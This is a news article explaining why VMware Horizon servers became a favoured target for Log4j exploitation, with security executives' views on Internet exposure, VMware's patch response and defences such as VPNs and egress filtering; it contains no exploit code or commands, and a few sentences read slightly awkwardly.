Why VMware Horizon Became a ‘Top Choice’ for Log4j Attacks


Missed a session from the Future of Work Summit? Visit our Future of Work Summit on-demand library to stream.

VMware Horizon has become one of the most popular targets for attackers looking to exploit the vulnerability in Log4j, underscoring the need to update remaining unpatched systems and implement security measures around its use.

For attackers, the virtual desktop platform offers an attractive combination of potential internet accessibility, wide use by wealthy enterprises, and valuable corporate data once in.

Like many VMware products, Horizon uses Apache Log4j, a widely used open source logging software component. That leaves unpatched versions of the product susceptible to the easily exploitable remote code execution vulnerability disclosed on December 9.

Attacker activity

Since its unveiling, numerous reports have emerged of attackers exploiting vulnerable instances of VMware Horizon, including from MicrosoftCrowdStrike and the UK National Health Service.

The most recent reports came this week, with BlackBerry researchers to reveal they have correlated attacks by an initial access broker group – known as “Prophet Spider” – with an exploit of the Log4j flaw in a VMware Horizon environment. also in a report this week, Red Canary said it has observed activity from Prophet Spider in connection with a Log4j exploit by Horizon.

As of late December, Red Canary researchers observed a notable increase in threat actor exploits of vulnerable VMware Horizon servers. Combined with other reports, this suggests VMware Horizon is “a top choice for adversaries to limit their Log4j targeting,” the Red Canary researchers said.

Cybersecurity executives told VentureBeat this week that VMware Horizon has been attacked so heavily for a combination of reasons, although the attackers also likely took advantage of lax security practices around using the platform.

Remote access

During the transition to remote working during the pandemic, many companies have exposed their VMware Horizon access gateways to the Internet, according to Jimmy Astle, senior director of discovery enablement at Red Canary. This allowed remote employees to access all of their company resources directly through their web browser.

“As the Horizon access gateways are connected to the remote internet, this may have inadvertently increased the overall exposure to this vulnerability,” Astle said in an email.

The fact that a company is running VMware Horizon in the first place is also a sign that it could be a valuable target for an attacker, he said. Horizon software and the hardware needed to run it don’t come cheap, meaning “the companies using it are typically well-funded and attractive targets,” Astle said.

Still, VMware Horizon is widely used by enterprises, another attractive element for attackers, executives said.

In fact, VMware Horizon is “possibly” the most widely used product with both Log4j and strong potential to be Internet-centric, said Jon Gaines, senior application security consultant at nVisium.

Thus, the wide use of VMware Horizon has provided threat actors with a wide range of possible targets, while also being more efficient from an exploit creation perspective.

Exploits against a particular vulnerability often need to be tailored to a specific product, “meaning attackers tend to build exploits that can hit the greatest number of targets,” said Yaniv Bar-Dayan, co-founder and CEO of Vulcan Cyber.

‘Rich target’

Meanwhile, the features of VMware Horizon itself, as a platform for virtual desktops and applications, are even more attractive to attackers.

“By compromising the Horizon instance, you can gain access to many virtual desktops and applications,” Gaines said in an email.

Access to multiple applications and virtual desktops “provides threat actors with valuable data,” as well as powerful hardware resources to mine cryptocurrencies, said Davis McCarthy, principal security researcher at Valtix.

With multiple hosts running in a single hypervisor, VMware Horizon is “a rich target by design,” McCarthy said in an email.

There are also good reasons why Horizon seems to be more targeted than other VMware products, many of which also include Log4j. In other VMware products, the vulnerability was not as easy to exploit, requiring multiple steps in some cases, said Matthew Warner, co-founder and chief technology officer at Blumira.

VMware Horizon is vulnerable by running a simple GET against any VMware Horizon server with a specific custom header, Warner said in an email. “This resulted in a situation where attackers who would normally perform scans and exploits could quickly add VMware Horizon to their attack patterns.”

Powerful response

For its part, VMware seems to have done what it could so far to respond to the issue, executives told VentureBeat.

The day after the Log4j vulnerability was revealed, VMware released a advisory and began releasing patches and fixes “very quickly,” Bar-Dayan said.

“VMware has done well here in enabling their customer community to update and protect their systems,” he said.

Gaines agreed, saying he was “impressed” by VMware’s response — which he noted included multiple blog posts and regular updates to the Log4j advisory.

McCarthy added that while VMware has provided “timely information about the vulnerability and what is needed to fix it” on its website, “this is not the case for other software vendors.”

In response to reports that attackers have exploited vulnerable Horizon instances, VMware said it was taking the situation surrounding the Log4j vulnerability “very seriously.”

Organizations using on-premises software “must take their own affirmative steps to apply the security patch in their own environment,” the company noted.

“Even with VMware’s security warnings and ongoing efforts to contact customers directly, we continue to see some companies fail to patch,” VMware said in its statement. “VMware Horizon products are vulnerable to critical Apache Log4j/Log4Shell vulnerabilities unless properly patched or mitigated using the information in our security advisory, VMSA 2021-0028, first published December 10, 2021 and regularly updated with new information. ”

Customers who have not applied the patch, or the latest fix in the VMware security advisory, “are at risk of being compromised — or may have already been compromised — by threat actors leveraging the Apache Log4shell vulnerability to actively penetrate unpatched Horizon. environments,” said VMware.

VMware also recommends that customers be FAQ document and join the VMware Security Announcement mailing list to receive future advice.

internet oriented

However, VMware Horizon’s compromises are about more than just unpatched systems, cyber executives told VentureBeat.

Roger Koehler, vice president of threat operations at Huntress, noted that his company’s research (using the Shodan search engine) revealed approximately 25,000 VMware Horizon servers that have been accessible to the Internet.

“If only 10% of these were vulnerable, that gives an attacker 2,500 Horizon servers to access an environment,” Koehler said in an email.

Executives said they see few situations where a company would have to allow Horizon internet access without additional security measures, such as a VPN and multi-factor authentication.

“There is almost never a situation where VMware Horizon should be internet-facing” without additional security, Warner said.

“If you want to get to something easier remotely, it has to be behind a VPN to do that,” he said.

Another common mistake made when opening up internal resources to the Internet is forgetting to implement outbound filtering rules, Astle said. Egress filtering allows you to control which ports are allowed to make outbound network connections from Internet-facing machines, he said.

“This single step would significantly hamper an attacker’s success rate in exploiting this vulnerability,” Astle said.

Patching, of course, remains crucial. While other security measures can help lower the risk of using Internet-accessible software, they are not a substitute for completely eliminating the vulnerability, executives said.

“The biggest recommendation for VMware Horizon administrators is to follow VMware’s advice and ensure that their systems are patched,” said Koehler.

VentureBeat’s mission is to be a digital city square for tech decision makers to learn about transformative business technology and transactions. Learn more

Leave a Reply

Your email address will not be published.